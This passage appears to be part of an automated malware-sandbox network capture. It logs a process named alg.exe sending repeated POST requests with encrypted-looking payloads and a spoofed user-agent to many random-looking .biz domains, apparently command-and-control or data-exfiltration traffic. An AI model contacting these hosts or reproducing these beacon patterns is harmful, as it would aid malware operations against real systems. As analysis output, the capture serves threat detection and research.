                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034605026 CET778OUTData Raw: 1e de 47 3f 33 72 57 f2 fe 02 00 00 c4 7a d5 34 2b b0 a4 e7 0c 5a 5c 80 11 ae e2 9e 95 0f f7 69 2c c6 b6 ed 8c a8 ab ed 95 4d cf 73 57 43 3f 98 72 30 ed 44 25 2b c5 24 f3 ff dd fd a9 8c 1f 48 4f 48 1f 09 b3 5b 6e ca 71 7b e7 a0 43 c3 f0 5c 76 2a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G?3rWz4+Z\i,MsWC?r0D%+$HOH[nq{C\v*LazK1)>UI[f::j?_Xc'n\feRQeF2f^65]H DHH0}'"Po.z~M}Rf
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.513679981 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=41062c10834d954eb0b5ba95c3cbfe93|155.94.241.187|1731920303|1731920303|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      88192.168.2.750067165.160.13.2080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.657634020 CET351OUTPOST /cqtkpvwafc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.657668114 CET842OUTData Raw: 49 32 78 0f c4 2e 83 3a 3e 03 00 00 e2 f1 f4 d7 68 5b 56 18 b9 35 62 ad 01 b1 4a 8e b8 74 0d c2 ef 01 d2 80 67 21 f0 11 5b 9e 80 63 0b 16 db d2 6c 50 35 7e a0 f9 82 72 ac 4a 63 bf fb ad 33 44 0d 5d c8 04 fe b5 e0 50 eb 7c 0d 06 b0 40 ed 10 06 cb
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: I2x.:>h[V5bJtg![clP5~rJc3D]P|@@LzC}qVa%w"+;H89h :%$9^Apzt4z/s)y7X*#;@g'Z"KETG<_(|jQ#
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.343055964 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.350097895 CET342OUTPOST /n HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.350121021 CET842OUTData Raw: 10 8a 6e 36 2f 44 39 2d 3e 03 00 00 66 99 cb 94 10 39 cc c3 32 f0 d6 2a 22 05 b8 c3 f8 cd 13 74 cf 19 78 21 54 cf b1 07 c8 5b 96 86 9e 9c 66 af 9c bc c9 5c 34 09 b1 1c da 89 b5 3b 92 8e 71 8e 2d c4 19 bd 5d 4f 4c 09 63 4c b7 2f 5d 35 86 f4 19 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: n6/D9->f92*"tx!T[f\4;q-]OLcL/]5ON31lN/Bl>*QL1d\[o6KPw6f._A(m4x1kfoUSpPJ]VKtdlo]c'obsax>Wv<W
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.525129080 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      89192.168.2.75006854.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.547789097 CET353OUTPOST /cuqmfcku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.547789097 CET842OUTData Raw: a7 b1 29 ab 51 0a 4c f0 3e 03 00 00 eb ef 03 d0 4a 74 22 0c 0e 1c 5e b2 7a 37 b6 f9 af a4 c5 75 7d 95 aa 12 d7 0d 93 54 1f 80 12 d6 b1 b0 0f 96 51 6a ce e8 d6 d6 23 f4 42 cb 6b c5 a3 a4 55 7f 02 75 80 97 ab 92 38 91 e6 fe ff 10 5f d6 44 f1 11 26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: )QL>Jt"^z7u}TQj#BkUu8_D&Mj\vbGe9H3 " mv[bd2mnP.<k{*SUK5%T]df(rpUdr=N7QXt;!>*Q3D0{E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.386568069 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=f740dc18c7e55a68f20dd23a1a39ecb8|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      90192.168.2.75006918.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088618040 CET349OUTPOST /ngmt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.088685989 CET778OUTData Raw: 86 8a 3b a1 f0 ac eb 88 fe 02 00 00 13 41 a4 a2 69 a0 77 d3 53 f3 5d ec f8 77 f5 2a 80 1f d6 fc 85 cc d7 b1 dd 95 b6 ed ad df 08 9d 17 2c 6a 8c 82 df 04 63 bf fc a6 3f 63 5f e5 12 72 c8 88 04 f6 13 3c 2c 28 07 c1 da 8b 78 cf 84 f0 30 6c 53 2b 98
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;AiwS]w*,jc?c_r<,(x0lS+n[Y?7.uhU1rylZ{T}^9_ uRR!#yr?.^q61G5n45pX('TN"({nosd3G-l3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.766616106 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=06b37bbb4f0729a01c5c176600dec33b|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      91192.168.2.75007034.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET348OUTPOST /mmajvqk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.711086988 CET842OUTData Raw: 66 76 0f 92 12 ae f6 77 3e 03 00 00 b2 90 87 df ab 3a 27 bd 36 36 e5 d5 db 0a 96 9b b7 97 6c 05 9f d9 85 4a 3c 56 e2 e6 02 ce b9 3b c1 42 0d c4 79 5e 31 b4 a5 27 01 55 3d 4d f7 ec d2 36 03 7c d9 0f fb 94 28 0a b8 da 96 91 0d 90 b4 d4 d3 70 c3 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: fvw>:'66lJ<V;By^1'U=M6|(pMhRh@?r7DE,\-l5ncH<AQKEi*'x5N,M6v/m@@Jix <k|D\I|#mj:F &RifE)qBgIz7M,_V
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.543222904 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=dfbbf9501aceedfea6d38609d3599db5|155.94.241.187|1731920305|1731920305|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      92192.168.2.75007113.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187603951 CET350OUTPOST /vudapeuv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.187663078 CET778OUTData Raw: c2 99 3b 92 c6 b3 c1 cb fe 02 00 00 a2 e3 24 f8 0d f1 f9 07 5a b9 19 27 a4 1f 3d 27 68 08 ee 8b ac 52 c1 95 e0 41 f1 d8 04 d4 cb 39 1e db c0 c2 68 0a e9 c6 b4 b9 5b f8 83 57 45 0d 7f b7 09 80 2f 7a 41 0c 7d d4 f5 1f 4d 25 9c 31 7c c6 18 3f 62 09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;$Z'='hRA9h[WE/zA}M%1|?bqZOxE@H|im2jczvS)Y?Y*;k9-Q{;}+P1tbg#yleZ;[RW=F[jtX;hOnUOB+0`k!,@cvCw13#0f2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.628956079 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=99a4cd3fd2a23030d059fa263a7c4d14|155.94.241.187|1731920306|1731920306|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      93192.168.2.75007254.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET359OUTPOST /qirifxoxiwrelcr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.584867954 CET842OUTData Raw: 8f 2e 3d 39 f6 1f 38 21 3e 03 00 00 61 21 22 74 87 ee 49 a3 66 8e 12 76 60 a6 c7 bc 38 9a 74 26 07 01 bd 7f 7f 2b 4b 7b d1 97 d8 61 15 c6 9a 51 a7 61 d9 2a d8 78 8d c1 22 ef 90 b8 c1 4d e9 24 5a 6f cc cd 7a 4d 6c fd f1 d7 d1 81 80 9b 2f fe 5f b3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: .=98!>a!"tIfv`8t&+K{aQa*x"M$ZozMl/_4OE\m+GDBc4+Z$Vfsb%YB%D%&j"Pp3\>`m>WOhPuXT>Btq<X^WRM'Rol>OXKH\sN/TA6\
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.416261911 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=93fae4186cbcfd0f4f0ccfd51ded2fb9|155.94.241.187|1731920306|1731920306|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      94192.168.2.75007318.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435285091 CET347OUTPOST /vhuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.435323954 CET842OUTData Raw: 53 55 2e f6 d3 0f 95 45 3e 03 00 00 e7 4b 07 71 7b 97 92 ac 8b 88 5c ba 73 10 0a 5e 97 c5 dd a4 a8 a7 1a 49 06 04 0f 9e 32 e7 5c 45 02 f9 a7 b9 98 49 c2 15 f2 c0 ac cb 07 e7 cb 2c a2 ba ad cc 11 31 cc 1b 10 3a 63 a4 31 66 bf 4a 41 d9 58 e3 0c 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SU.E>Kq{\s^I2\EI,1:c1fJAXFu8|'Ld>o!QMw/PX<nOcaM nZC/"*]f%b8qFju`stQ@Y&.wR=S^L2O|_JUi>V
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.890146017 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9975fae3d207131ce21f81930c161e52|155.94.241.187|1731920307|1731920307|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      95192.168.2.75007434.246.200.160805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET352OUTPOST /vjfojjg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.233120918 CET778OUTData Raw: ab 16 50 20 6b c7 ad fc fe 02 00 00 f9 64 29 26 79 37 e4 2b 3f 02 d0 37 70 62 16 89 e4 3e 53 29 67 4f 47 8f 25 85 0e df 71 db 19 2f 27 d8 9f 3b 4f 62 bf a4 12 b5 73 0d a1 aa 86 01 b2 8d c2 1b ae fa 41 87 6d 10 2f 7c f7 46 ac b2 08 12 6d af 12 10
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: P kd)&y7+?7pb>S)gOG%q/';ObsAm/|Fmi|Qg~RM;#Mf_ZI#X@;qvy&>mL!gQ1~EY2#t`"hU3S'YP,cLf%M6<J!~kvMyf


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      96192.168.2.75007534.246.200.160805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET347OUTPOST /xu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.761553049 CET778OUTData Raw: f1 d0 63 88 33 d3 3c 93 fe 02 00 00 1b 46 f9 ef 8a 42 ef 65 28 7d 05 bb 32 7b 84 cc 01 cc af e7 4d df f6 c7 27 44 e6 d4 0a a5 8a dd 9f d5 fc 9d aa 95 3b a7 6e df fa a3 79 17 8b 22 72 82 2d 60 f1 84 e3 fa 31 30 0f 81 30 3a f1 79 f5 16 ce db 2a ad
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: c3<FBe(}2{M'D;ny"r-`100:y*|"@Aij>cci3YG&SpQFQ<yWLFN9".SB#AnPsRKg,q-}YmNycVF3cX<bW}
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.722635031 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:28 GMT
